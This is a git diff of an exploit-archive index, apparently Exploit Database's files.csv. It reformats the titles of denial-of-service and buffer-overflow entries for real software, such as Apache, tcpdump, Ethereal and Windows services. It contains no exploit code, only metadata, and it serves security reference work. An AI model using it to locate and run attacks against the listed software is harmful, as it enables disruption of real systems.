diff --git a/files.csv b/files.csv index e652db820..b64b3162c 100644 --- a/files.csv +++ b/files.csv @@ -76,7 +76,7 @@ id,file,description,date,author,platform,type,port 471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",windows,dos,66 474,platforms/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0 477,platforms/windows/dos/477.c,"PopMessenger 1.60 - Remote Denial of Service",2004-09-23,"Luigi Auriemma",windows,dos,8473 -551,platforms/linux/dos/551.c,"MyServer 0.7.1 - (POST) Denial of Service",2004-09-27,"Tom Ferris",linux,dos,0 +551,platforms/linux/dos/551.c,"MyServer 0.7.1 - 'POST' Denial of Service",2004-09-27,"Tom Ferris",linux,dos,0 562,platforms/windows/dos/562.c,"MSSQL 7.0 - Remote Denial of Service",2004-09-29,"securma massine",windows,dos,0 571,platforms/windows/dos/571.c,"Monolith Games - Local Buffer Overflow",2004-10-10,"Luigi Auriemma",windows,dos,0 578,platforms/windows/dos/578.pl,"Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0 @@ -128,7 +128,7 @@ id,file,description,date,author,platform,type,port 782,platforms/windows/dos/782.pl,"TinyWeb 1.9 - Denial of Service",2005-02-01,karak0rsan,windows,dos,80 783,platforms/windows/dos/783.c,"Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow",2005-02-02,"Luigi Auriemma",windows,dos,0 789,platforms/linux/dos/789.c,"ngIRCd 0.8.1 - Remote Denial of Service (2)",2005-02-05,CorryL,linux,dos,6667 -797,platforms/windows/dos/797.py,"Foxmail 2.0 - (MAIL FROM:) Denial of Service",2005-02-07,OYXin,windows,dos,0 +797,platforms/windows/dos/797.py,"Foxmail 2.0 - 'MAIL FROM:' Denial of Service",2005-02-07,OYXin,windows,dos,0 799,platforms/osx/dos/799.c,"Apple Mac OSX - AppleFileServer Remote Denial of Service",2005-02-08,nemo,osx,dos,0 810,platforms/windows/dos/810.c,"Armagetron Advanced 0.2.7.0 - Server Crash",2005-02-10,"Luigi Auriemma",windows,dos,0 813,platforms/windows/dos/813.c,"Quake 3 Engine - Infostring Crash and Shutdown Exploit",2005-02-12,"Luigi Auriemma",windows,dos,0 @@ -141,7 +141,7 @@ id,file,description,date,author,platform,type,port 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0 855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 -856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - (BlueTooth Nickname) Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 +856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 861,platforms/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos,0 867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 869,platforms/bsd/dos/869.c,"OpenBSD 2.0 < 3.6 - TCP Timestamp Remote Denial of Service",2005-03-09,RusH,bsd,dos,0 @@ -163,13 +163,13 @@ id,file,description,date,author,platform,type,port 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot Denial of Service",2005-04-19,ChoiX,multiple,dos,0 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)",2005-04-20,houseofdabus,multiple,dos,0 -956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service",2005-04-26,vade79,multiple,dos,0 -957,platforms/linux/dos/957.c,"Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 -958,platforms/linux/dos/958.c,"Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 -959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 - (isis_print) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 +956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - 'rsvp_print' Infinite Loop Denial of Service",2005-04-26,vade79,multiple,dos,0 +957,platforms/linux/dos/957.c,"Tcpdump 3.8.x - 'ldp_print' Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 +958,platforms/linux/dos/958.c,"Tcpdump 3.8.x - 'rt_routing_info' Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 +959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 - 'isis_print' Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 978,platforms/windows/dos/978.cpp,"Ashley's Web Server - Denial of Service",2005-05-04,basher13,windows,dos,0 983,platforms/windows/dos/983.cpp,"DataTrac Activity Console - Denial of Service",2005-05-06,basher13,windows,dos,0 -984,platforms/multiple/dos/984.c,"Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service",2005-05-07,Nicob,multiple,dos,0 +984,platforms/multiple/dos/984.c,"Ethereal 0.10.10 - 'dissect_ipc_state' Remote Denial of Service",2005-05-07,Nicob,multiple,dos,0 40381,platforms/android/dos/40381.txt,"Google Android - getpidcon Usage binder Service Replacement Race Condition",2016-09-14,"Google Security Research",android,dos,0 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,windows,dos,0 998,platforms/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service",2005-05-17,alert7,linux,dos,0 @@ -181,11 +181,11 @@ id,file,description,date,author,platform,type,port 1027,platforms/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service",2005-06-02,ATmaCA,windows,dos,0 1037,platforms/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,multiple,dos,0 1056,platforms/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 -1063,platforms/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users Denial of Service (Perl)",2005-06-22,g30rg3_x,php,dos,0 -1064,platforms/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users Denial of Service (C)",2005-06-22,HaCkZaTaN,php,dos,0 +1063,platforms/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl)",2005-06-22,g30rg3_x,php,dos,0 +1064,platforms/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C)",2005-06-22,HaCkZaTaN,php,dos,0 1065,platforms/windows/dos/1065.c,"Microsoft Windows - 'SMB' Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service",2005-06-25,basher13,windows,dos,0 -1072,platforms/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service Attack",2005-06-27,"Marco Del Percio",multiple,dos,0 +1072,platforms/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service",2005-06-27,"Marco Del Percio",multiple,dos,0 1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service",2005-07-06,basher13,windows,dos,0 1093,platforms/windows/dos/1093.c,"PrivaShare 1.3 - Denial of Service",2005-07-07,basher13,windows,dos,0 1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW 1.05 - Denial of Service",2005-07-07,Qnix,windows,dos,0 @@ -207,29 +207,29 @@ id,file,description,date,author,platform,type,port 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0 -1158,platforms/windows/dos/1158.pl,"Ipswitch WS_FTP Server 5.03 - (RNFR) Buffer Overflow",2004-11-29,"Reed Arvin",windows,dos,0 -1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a - (check) Buffer Overflow",2004-12-01,"Reed Arvin",windows,dos,0 -1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro 2.52 - (USER) Remote Buffer Overflow",2005-04-27,"Reed Arvin",windows,dos,0 +1158,platforms/windows/dos/1158.pl,"Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow",2004-11-29,"Reed Arvin",windows,dos,0 +1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow",2004-12-01,"Reed Arvin",windows,dos,0 +1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro 2.52 - 'USER' Remote Buffer Overflow",2005-04-27,"Reed Arvin",windows,dos,0 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server 5.14 - Denial of Service",2005-06-07,"Reed Arvin",windows,dos,0 1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition 5.2.2 - Denial of Service",2005-06-26,"Reed Arvin",windows,dos,0 1164,platforms/windows/dos/1164.pl,"BusinessMail Server 4.60.00 - Remote Buffer Overflow",2005-07-30,"Reed Arvin",windows,dos,0 -1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - (SMTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 -1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - (FTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 -1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - (adduser) Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos,0 +1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - 'SMTP' Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 +1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - 'FTP' Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 +1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - 'adduser' Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos,0 1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service",2005-08-23,"Luigi Auriemma",multiple,dos,0 -1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service",2005-09-02,basher13,windows,dos,0 +1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - 'command' Denial of Service",2005-09-02,basher13,windows,dos,0 1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - GET Request Denial of Service",2005-09-05,tracewar,linux,dos,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0 -1204,platforms/multiple/dos/1204.html,"Mozilla Products - (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 +1204,platforms/multiple/dos/1204.html,"Mozilla Products - 'Host:' Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,windows,dos,0 1213,platforms/multiple/dos/1213.c,"Snort 2.4.0 - SACK TCP Option Error Handling Denial of Service",2005-09-12,nitr0us,multiple,dos,0 1218,platforms/windows/dos/1218.c,"Stoney FTPd - Denial of Service (rxBot mods ftpd)",2005-09-16,D-oNe,windows,dos,0 -1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - (HEAD) Denial of Service",2005-09-16,karak0rsan,windows,dos,0 +1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service",2005-09-16,karak0rsan,windows,dos,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0 1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0 1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0 1239,platforms/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service",2005-10-02,"Luigi Auriemma",windows,dos,0 -1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - (Hijacking Command) Denial of Service",2005-10-11,basher13,windows,dos,0 +1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - Hijacking Command Denial of Service",2005-10-11,basher13,windows,dos,0 1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,windows,dos,0 1253,platforms/multiple/dos/1253.html,"Mozilla Firefox 1.0.7 / Thunderbird 1.0.6 - Denial of Service",2005-10-16,posidron,multiple,dos,0 1254,platforms/multiple/dos/1254.html,"Opera 8.02 - Remote Denial of Service (1)",2005-10-16,posidron,multiple,dos,0 @@ -291,7 +291,7 @@ id,file,description,date,author,platform,type,port 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service",2006-02-28,"Evgeny Legerov",bsd,dos,0 1551,platforms/hardware/dos/1551.txt,"Multiple Routers - (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0 -1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - (Jumbo Malloc) Denial of Service Crash",2006-03-06,"Luigi Auriemma",windows,dos,0 +1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - (Jumbo Malloc) Crash (Denial of Service)",2006-03-06,"Luigi Auriemma",windows,dos,0 1558,platforms/windows/dos/1558.c,"LieroX 0.62b - Remote Server/Client Denial of Service",2006-03-06,"Luigi Auriemma",windows,dos,0 1559,platforms/windows/dos/1559.c,"Sauerbraten 2006_02_28 - Multiple Buffer Overflow/Crash Vulnerabilities",2006-03-06,"Luigi Auriemma",windows,dos,0 1560,platforms/windows/dos/1560.c,"Cube 2005_08_29 - Multiple Buffer Overflow/Crash Vulnerabilities",2006-03-06,"Luigi Auriemma",windows,dos,0 @@ -370,17 +370,17 @@ id,file,description,date,author,platform,type,port 2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,windows,dos,0 2059,platforms/hardware/dos/2059.cpp,"D-Link Router - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 2073,platforms/multiple/dos/2073.c,"libmikmod 3.2.2 - (GT2 loader) Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",multiple,dos,0 -2124,platforms/windows/dos/2124.php,"XChat 2.6.7 - (Windows) Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos,0 -2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 - (Windows) Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0 +2124,platforms/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos,0 +2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0 2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0 2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflow (PoC)",2006-08-10,"Luigi Auriemma",windows,dos,0 -2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0 +2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)",2006-08-13,Qode,hardware,dos,0 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0 2194,platforms/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,windows,dos,0 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,windows,dos,0 -2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash",2006-08-18,Mr.Niega,windows,dos,0 +2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Crash (Denial of Service)",2006-08-18,Mr.Niega,windows,dos,0 2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)",2006-08-18,vegas78,windows,dos,0 2237,platforms/multiple/dos/2237.sh,"Apache (mod_rewrite) < 1.3.37 / 2.0.59 / 2.2.3 - Remote Overflow (PoC)",2006-08-21,"Jacobo Avariento",multiple,dos,0 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service",2006-08-21,nop,windows,dos,0 @@ -455,11 +455,11 @@ id,file,description,date,author,platform,type,port 3013,platforms/windows/dos/3013.py,"Microsoft Windows - NetrWkstaUserEnum() Remote Denial of Service",2006-12-25,h07,windows,dos,0 3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 - (PRIVMSG) Remote Buffer Overflow (PoC)",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 'ierpplug.dll' Internet Explorer 7 - Denial of Service",2006-12-28,shinnai,windows,dos,0 -3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Denial of Service Crash",2006-12-28,shinnai,windows,dos,0 +3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Crash (Denial of Service)",2006-12-28,shinnai,windows,dos,0 3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service",2006-12-29,rgod,windows,dos,0 3041,platforms/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 3042,platforms/windows/dos/3042.html,"Macromedia Shockwave 10 'SwDir.dll' Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 -3052,platforms/windows/dos/3052.c,"Microsoft Windows - NtRaiseHardError 'Csrss.exe/winsrv.dll' Double-Free",2006-12-31,"Ruben Santamarta",windows,dos,0 +3052,platforms/windows/dos/3052.c,"Microsoft Windows - 'Csrss.exe/winsrv.dll' NtRaiseHardError Double-Free",2006-12-31,"Ruben Santamarta",windows,dos,0 3056,platforms/windows/dos/3056.pl,"Formbankserver 1.9 - (Name) Remote Denial of Service",2006-12-31,Bl0od3r,windows,dos,0 3069,platforms/osx/dos/3069.pl,"VideoLAN VLC Media Player 0.8.6 (PPC) - (udp://) Format String (PoC)",2007-01-02,MoAB,osx,dos,0 3078,platforms/windows/dos/3078.pl,"Acunetix WVS 4.0 20060717 - HTTP Sniffer Component Remote Denial of Service",2007-01-04,nitr0us,windows,dos,0 @@ -538,7 +538,7 @@ id,file,description,date,author,platform,type,port 3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0 3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double-Free (PoC)",2007-03-27,"Stefan Esser",linux,dos,0 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 -3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Denial of Service Hang / Crash",2007-03-29,shinnai,multiple,dos,0 +3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Hang / Crash (Denial of Service)",2007-03-29,shinnai,multiple,dos,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service",2007-04-05,WiLdBoY,windows,dos,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows Explorer - Unspecified '.ANI' File Denial of Service",2007-04-08,Marsu,windows,dos,0 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 @@ -675,7 +675,7 @@ id,file,description,date,author,platform,type,port 4773,platforms/multiple/dos/4773.pl,"OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash",2007-12-23,"Noam Rathaus",multiple,dos,0 4801,platforms/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX Start() Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos,0 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service (PoC)",2008-01-02,anonymous,windows,dos,0 -4856,platforms/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - Denial of Service (no-steam)",2008-01-06,"Eugene Minaev",multiple,dos,0 +4856,platforms/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - 'no-steam' Denial of Service",2008-01-06,"Eugene Minaev",multiple,dos,0 4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0 4885,platforms/windows/dos/4885.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0 @@ -816,7 +816,7 @@ id,file,description,date,author,platform,type,port 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 6660,platforms/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 -6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash",2008-10-04,suN8Hclf,windows,dos,0 +6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - Malformed .GIF Image Local Crash",2008-10-04,suN8Hclf,windows,dos,0 6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash",2008-10-05,suN8Hclf,windows,dos,0 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash",2008-10-05,suN8Hclf,windows,dos,0 @@ -904,10 +904,10 @@ id,file,description,date,author,platform,type,port 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)",2009-01-09,Houssamix,windows,dos,0 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",windows,dos,0 7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,windows,dos,0 -7720,platforms/windows/dos/7720.pl,"Microsoft Windows - '.chm' Denial of Service (HTML compiled)",2009-01-11,securfrog,windows,dos,0 +7720,platforms/windows/dos/7720.pl,"Microsoft Windows - '.chm' Denial of Service (HTML Compiled)",2009-01-11,securfrog,windows,dos,0 7721,platforms/windows/dos/7721.pl,"Browse3D 3.5 - '.sfs' Local Buffer Overflow (PoC)",2009-01-11,Houssamix,windows,dos,0 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)",2009-01-12,zAx,windows,dos,0 -7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' Multiple Denial of Services",2009-01-12,securfrog,windows,dos,0 +7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' File Multiple Denial of Service Vulnerabilities",2009-01-12,securfrog,windows,dos,0 7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite",2009-01-13,Stack,windows,dos,0 7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow (PoC)",2009-01-13,Stack,windows,dos,0 7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption",2009-01-13,His0k4,windows,dos,0 @@ -1077,7 +1077,7 @@ id,file,description,date,author,platform,type,port 8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos,0 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos,0 -8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server - Low Bandwidth Denial of Service (slowloris.pl)",2009-06-17,RSnake,multiple,dos,0 +8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server - 'slowloris.pl' Low Bandwidth Denial of Service",2009-06-17,RSnake,multiple,dos,0 8982,platforms/linux/dos/8982.txt,"Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,linux,dos,0 8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server - Low Bandwidth Denial of Service (2)",2009-06-22,evilrabbi,multiple,dos,0 9006,platforms/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Denial of Service",2009-06-23,Nibin,windows,dos,0 @@ -1289,11 +1289,11 @@ id,file,description,date,author,platform,type,port 10377,platforms/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code",2009-11-18,"Core Security",windows,dos,2315 10469,platforms/linux/dos/10469.py,"Monkey HTTP Daemon < 0.9.3 - Denial of Service",2009-12-16,"Patroklos Argyroudis",linux,dos,80 14034,platforms/windows/dos/14034.pl,"Wincalc 2 - '.num' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 -10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local Denial of Service Buffer Overflow",2009-12-16,Connection,windows,dos,0 +10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local Buffer Overflow (Denial of Service)",2009-12-16,Connection,windows,dos,0 40306,platforms/php/dos/40306.php,"PHP 5.0.0 - 'xmldocfile()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 40307,platforms/multiple/dos/40307.txt,"Adobe Flash - Selection.setFocus Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0 10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers - Remote Denial of Service",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0 -10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - (Content-Type) Denial of Service",2009-12-21,"Alberto Ortega",hardware,dos,0 +10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - 'Content-Type' Denial of Service",2009-12-21,"Alberto Ortega",hardware,dos,0 10593,platforms/windows/dos/10593.txt,"Winamp 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0 10603,platforms/windows/dos/10603.c,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,windows,dos,0 10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0 @@ -1311,7 +1311,7 @@ id,file,description,date,author,platform,type,port 10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 - '.aap' Buffer Overflow Denial of Service",2009-12-31,jacky,windows,dos,0 10902,platforms/windows/dos/10902.pl,"Nero Express 7.9.6.4 - Local Heap (PoC)",2010-01-01,"D3V!L FUCKER",windows,dos,0 10904,platforms/windows/dos/10904.pl,"Switch Sound File Converter - '.mpga' 